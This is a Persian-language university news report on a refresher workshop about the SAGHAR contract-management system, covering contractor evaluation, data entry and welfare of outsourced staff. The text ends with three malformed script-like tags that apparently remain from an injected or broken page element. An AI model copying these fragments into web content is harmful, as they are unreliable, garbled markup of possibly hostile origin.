مدیر امور رفاهی و پشتیبانی دانشگاه در کارگاه باز آموزی سامانه ساقر گفت:

دانشگاه علوم پزشکی ابن سینا همدان کامل ترین نسخه سامانه ساقر را در کشور به خود اختصاص داده است

کارگاه باز آموزشی سامانه ساقر با حضور آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدریت و منابع دانشگاه، کارگاه باز آموزشی سامانه ساقر در سالن کنفرانس مرکز همایش های دانشگاه علوم پزشکی ابن سینا همدان به مدرسی آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه، مسئولین امور عمومی شبکه ها و بیمارستان های دانشگاهی استان، مسئولین امور قرارداد ها و دیگر کارشناسان مربوطه برگزار شد.

آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه ضمن تأکید بر اهمیت سامانه ساقر در دانشگاه علوم پزشکی ابن سینا، بر ثبت دقیق و صحیح اطلاعات قراردادها، کارکنان شرکتی و پیمانکاران طرف قرارداد با دانشگاه تاکید کرد.

وی در ادامه افزود: در سامانه ساقر، بند جدیدی در خصوص ارزیابی پیمانکاران طرف قرارداد با مراکز تابع دانشگاه اضافه شده است که می‌توان در طی مدت قرارداد طبق سنجه های امتیاز دهی، اعلام رضایت از عملکرد پیمانکار را نسبت به تعهدات درج شده در قرارداد ثبت کرد و صلاحیت مجدد حضور پیمانکار مذکور را در مناقصات مجدد دانشگاه اعلام کرد.

مدیر امور رفاهی و پشتیبانی دانشگاه عنوان کرد: در زمینه های مختلف در خصوص سامانه ساقر مشکلات و ایراداتی از نظر نرم افزاری وجود داشت که طی رایزنی ها و جلسات با مدیریت فناوری اطلاعات و ارتباطات و آمار دانشگاه، رفع شده است و می‌توان گفت در سطح کشور، دانشگاه علوم پزشکی ابن سینا همدان کامل ترین نسخه از این سامانه را به خود اختصاص داده است.

وی همچنین اظهار داشت: مدیران و مسئولین امور عمومی واحد های تابع دانشگاه در نظر داشته باشند که باید درخواست مجوزهای خود را از این پس در این سامانه به ثبت برسانند و به موقع بودن ثبت درخواست ها از اهمیت بسیار بالایی برخوردار خواهد بود.

آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه ضمن تاکید بر افزایش مطالعه در زمینه های مختلف قانون های شغلی و کاری اظهار داشت: مطالعه بر قوانین در زمینه های مختلف از جمله ، قانون کار و امور رفاهی، آیین نامه های مالی و معاملاتی مرتبط با دانشگاه، آخرین دستورالعمل های تضامین و ضوابط قانون نوین بودجه را باید یکی از ارکان اصلی خود در سال جاری قرار دهیم و نسبت به آن دارای تسلط نسبی باشیم.

وی همچنین ضمن اشاره بر اهمیت نظارت بر عملکرد شرکت های طرف قرارداد با دانشگاه اظهار داشت: این که یک شرکتی طبق مفاد و قانون با دانشگاه قرارداد کاری را می بندد و نظارت بر آن نباشد و یا کم باشد صحیح نیست بلکه باید به طور مداوم و دوره ای طبق سنجه های امتیازدهی، ارزیابی شود تا در این بین حقی از کسی ضایع نشود و بیت المال نیز در مسیر درست و صحیح استفاده و خرج شود.

مدیر امور رفاهی و پشتیبانی دانشگاه در پایان افزود: نیروی انسانی در هر مجموعه  ای و با هر نوع قرارداد کاری، سرمایه های آن مجموعه می باشند و بسیار قابل احترام هستند و از نظر حقوق و مزایا و همچنین معیشتی باید مورد توجه ویژه قرار گیرند که در تلاش هستیم نیروهای شرکتی( در قالب خرید خدمت) از نظر پرداخت به موقع مزایا، رفاه و معیشت در سطح قابل قبولی قرار گیرند.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>